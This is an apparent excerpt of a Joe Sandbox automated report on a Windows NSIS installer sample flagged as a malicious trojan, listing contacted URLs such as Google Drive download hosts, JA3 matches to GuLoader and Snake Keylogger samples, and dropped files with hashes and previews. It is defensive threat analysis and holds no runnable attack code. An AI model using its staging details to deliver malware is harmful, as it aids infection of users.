                                          https://www.google.commsiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://g.live.com/odclientsettings/ProdV2edb.log.3.drfalse
                                              		high
                                              http://nsis.sf.net/NSIS_ErrorGyGE2VaBFL.exe, GyGE2VaBFL.exe.1.drfalse
                                                		high
                                                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000003.00000003.1205213974.0000017F884C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drfalse
                                                  		high
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1666170853.0000000004E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.google.com/msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://drive.usercontent.google.com/do0msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.google.com/Umsiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://apis.google.commsiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1666170853.0000000004E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://drive.google.com/fmsiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000003.00000003.1205213974.0000017F884C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        142.250.185.193
                                                                        		drive.usercontent.google.comUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        216.58.206.78
                                                                        		drive.google.comUnited States
                                                                        		15169GOOGLEUSfalse

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1632354
                                                                        Start date and time:2025-03-07 22:44:48 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 6m 21s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:13
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:GyGE2VaBFL.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:0a494235e29b9a51ba2120377cbc09ae119c0e6eda64072218343e69c85d1783.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@7/27@2/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 33.3%
                                                                        HCA Information:
                                                                        • Successful, ratio: 93%
                                                                        • Number of executed functions: 84
                                                                        • Number of non-executed functions: 40
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 23.60.203.209
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.f.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                                                                        • Execution Graph export aborted for target powershell.exe, PID 7720 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        16:45:46API Interceptor41x Sleep call for process: powershell.exe modified
                                                                        16:45:47API Interceptor2x Sleep call for process: svchost.exe modified
                                                                        16:46:45API Interceptor10x Sleep call for process: msiexec.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        No context

                                                                        Domains

                                                                        No context

                                                                        ASNs

                                                                        No context

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        37f463bf4616ecd445d4a1937da06e191258ad6Jpw.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 216.58.206.78
                                                                        • 142.250.185.193
                                                                        ZUY4Nq2SyY.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 216.58.206.78
                                                                        • 142.250.185.193
                                                                        cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 216.58.206.78
                                                                        • 142.250.185.193
                                                                        axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 216.58.206.78
                                                                        • 142.250.185.193
                                                                        sR4s2qQF6I.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 216.58.206.78
                                                                        • 142.250.185.193
                                                                        VnaQJI0ScP.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 216.58.206.78
                                                                        • 142.250.185.193
                                                                        bvhauD4o49.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 216.58.206.78
                                                                        • 142.250.185.193
                                                                        26YzPy68Rz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 216.58.206.78
                                                                        • 142.250.185.193
                                                                        CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 216.58.206.78
                                                                        • 142.250.185.193
                                                                        R513Lbg4Qu.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 216.58.206.78
                                                                        • 142.250.185.193

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):1.3073662174470488
                                                                        Encrypted:false
                                                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrf:KooCEYhgYEL0In
                                                                        MD5:6C26B1A84A15EA72D024C3CA321F0F43
                                                                        SHA1:AE352680D26D98E431FA281D62E60C51E5309F29
                                                                        SHA-256:F492F5F47DDC2E4DC249F212831CF7CE176AA00199B15B0DBECB0CB9AA655762
                                                                        SHA-512:BB7E553BA766A2A11BC133083A53CB24F89670D4DD1147A034CAA81843A9F95413B8AA3DAD294312049FB7D593C7D960C3B70E2AF1DD405C29B2387ED33B010B
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xaa332701, page size 16384, DirtyShutdown, Windows version 10.0
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.4221517097470329
                                                                        Encrypted:false
                                                                        SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                        MD5:9F0210455A788C5EC4399730917CA80D
                                                                        SHA1:EFE5B8798EC6C6A9124B29AFECEFB0843961E233
                                                                        SHA-256:8D27833F9420FCB87CE1B61A6913D796594CD5AE1379152B796D344654F81AE8
                                                                        SHA-512:4DE09870AADA85F7807A2922BDAE5FCD82F050E9E87D48308F5C2DDDF9D0E865457E39C8963785257EF69A2A1E3568733EAA2D2956D33247557C4746338C5D76
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:.3'.... .......A.......X\...;...{......................0.!..........{A./-...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................x../-...}...................+./-...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):0.07722811369453877
                                                                        Encrypted:false
                                                                        SSDEEP:3:blXKYe9NVmYGjjn13a/H9tAllcVO/lnlZMxZNQl:b1Kz9NEYGj53q/AOewk
                                                                        MD5:5050EAF3EC42DD5B8F9A7DCC5538CE57
                                                                        SHA1:3B61F0163A4CB3B4EF4A92C56F33B22B5E88CE54
                                                                        SHA-256:123BDD6EF26C97E41C5DD2FEAEE403A03B0389D15CC30F6447819B594A9ACE7C
                                                                        SHA-512:C9832F7273D7C41C777488086EBFC73E985663298699A63BADE7C70F4E2AA1B47D7B1300D22CB66289A3F7CCADA0AE45E311203B31098A173FDFAE4281430F90
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:.X.......................................;...{../-...}.......{A..............{A......{A..........{A]..................+./-...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):53158
                                                                        Entropy (8bit):5.062687652912555
                                                                        Encrypted:false
                                                                        SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                        MD5:5D430F1344CE89737902AEC47C61C930
                                                                        SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                        SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                        SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tgcfyd3.igl.ps1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5kaluqev.zwz.psm1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hattfnkq.cpf.ps1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwalicvc.tdj.psm1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exe

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Category:dropped
                                                                        Size (bytes):791053
                                                                        Entropy (8bit):7.596359760786588
                                                                        Encrypted:false
                                                                        SSDEEP:12288:2tlyuHaQfKR13fxFozNXofFxNc3pipkyfGSw:AbQRdpAiF3c5yfFw
                                                                        MD5:D8EACF83CA07943696BF5E23528CC348
                                                                        SHA1:1AA708342F955F268F43CBD7705DC1497CF91D46
                                                                        SHA-256:0A494235E29B9A51BA2120377CBC09AE119C0E6EDA64072218343E69C85D1783
                                                                        SHA-512:72D24F737152A33FB7B9BB38B4DC9886711F8A1CD4089021AA08482DB193221359CAC6836F63362994E988F02788E00DCB0A836C0387DF19F04BB557561F8FEC
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Virustotal, Detection: 64%, Browse
                                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L......`.................d....9.....%3............@...........................=...........@.................................8........0;.h............................................................................................................text...0b.......d.................. ..`.rdata..t............h..............@..@.data...x.9..........|..............@....ndata.......@:..........................rsrc...h....0;.....................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exe:Zone.Identifier

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:true
                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\Krukkes.for

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):216186
                                                                        Entropy (8bit):1.2440696313854045
                                                                        Encrypted:false
                                                                        SSDEEP:3072:JWmCwIPw5AcywvTvHnxuoEWljFo26U82/LdKhBMqn3xh0:7BIM8I
                                                                        MD5:A294462A1566CE13B91DCE3515CBBE99
                                                                        SHA1:2EE7CA771D5EE98F23DFD60AEF636063FB9FB39E
                                                                        SHA-256:159A445C0FE5840209F47C0846AAC408D7A52CB16BF69E8ED9EF461CF9618063
                                                                        SHA-512:E08266B0CAF0E0089EFCA6FF49924E65073B89F26B60F84642F744E4C24BD8F0F61F892BC5DA8C36A276CA40090DF427DCA581B43AEDB841F2188983F2CBDE21
                                                                        Malicious:false
                                                                        Preview:........................9...........w............~.................................[...............Z........................../......C..........................................).......................................#..........................................................b.......................................................0..............................................L...................................2........................8..............%......w........................F.............................................................................................................G.................................................................E.........................v.............................................q......................V........l...........................................................................................................`...............i..l.....".......,..............F...................................U...........m......................X.....

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\Levnedsmiddelet.hyd

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):52515
                                                                        Entropy (8bit):1.2339950087992486
                                                                        Encrypted:false
                                                                        SSDEEP:384:TZuT1tvvcUHAApb0CSLYXN2ESvROeZ+tAKgXBmf6rF0OxFpsDcfTcG+nOMT60EI/:ItMfIDSvRBZ+tbgXBDF0Ovx+fT64oNy
                                                                        MD5:7FB552F9EDF2578492ECB1AC6ED812D4
                                                                        SHA1:D976EC08EE4E7F05B8A370B904332F56471D27DE
                                                                        SHA-256:6356F2D4505DB44E6E8159A1D677250F09B796DDDB00182951E16D04E7A53F63
                                                                        SHA-512:342ECEFD649D96C9A06DC283DB808A4320A2803DCD461FE509E5D564ABB612EF4B65A9450511189B29E49D5A4087A3F27A9D5C15EEEC2D2EB55C49D486F48F54
                                                                        Malicious:false
                                                                        Preview:.........................................................................................................................a........'.B................................................................................`...................S.........................................................................................3....................................P...............................q..........................9..........R...'...................p...................................................................................................................>..............4..............................l..".......................................................o....................T....................;...........+..................................v.....6................................b../......g.......x..............................S.........g7#................b.....................................................?................................................................

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\Meir.ini

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
                                                                        Category:dropped
                                                                        Size (bytes):6406
                                                                        Entropy (8bit):7.91324021094192
                                                                        Encrypted:false
                                                                        SSDEEP:192:LXXQXQ7uxIm/3REK132D5phEiQirK5Xvctcs:7XzuOmvyfhEE25XvJs
                                                                        MD5:69FDCA2AECDDEC1F02F8849BB7524031
                                                                        SHA1:897688E80B403AAC39036851ABDF8D07F948CFED
                                                                        SHA-256:7AFD32B592315D4D5DACC9205EDB18F058CC312B95C690AEC795AE1C5CDBCFD9
                                                                        SHA-512:0AEE6236EC213A1F829F64A94F277C334467CCA974664104129BD3B52E8FDCC049741B73E5B5E9453A1B8D7E5A828C5DB8A5BBECB4A3FF5470B42C082469172B
                                                                        Malicious:false
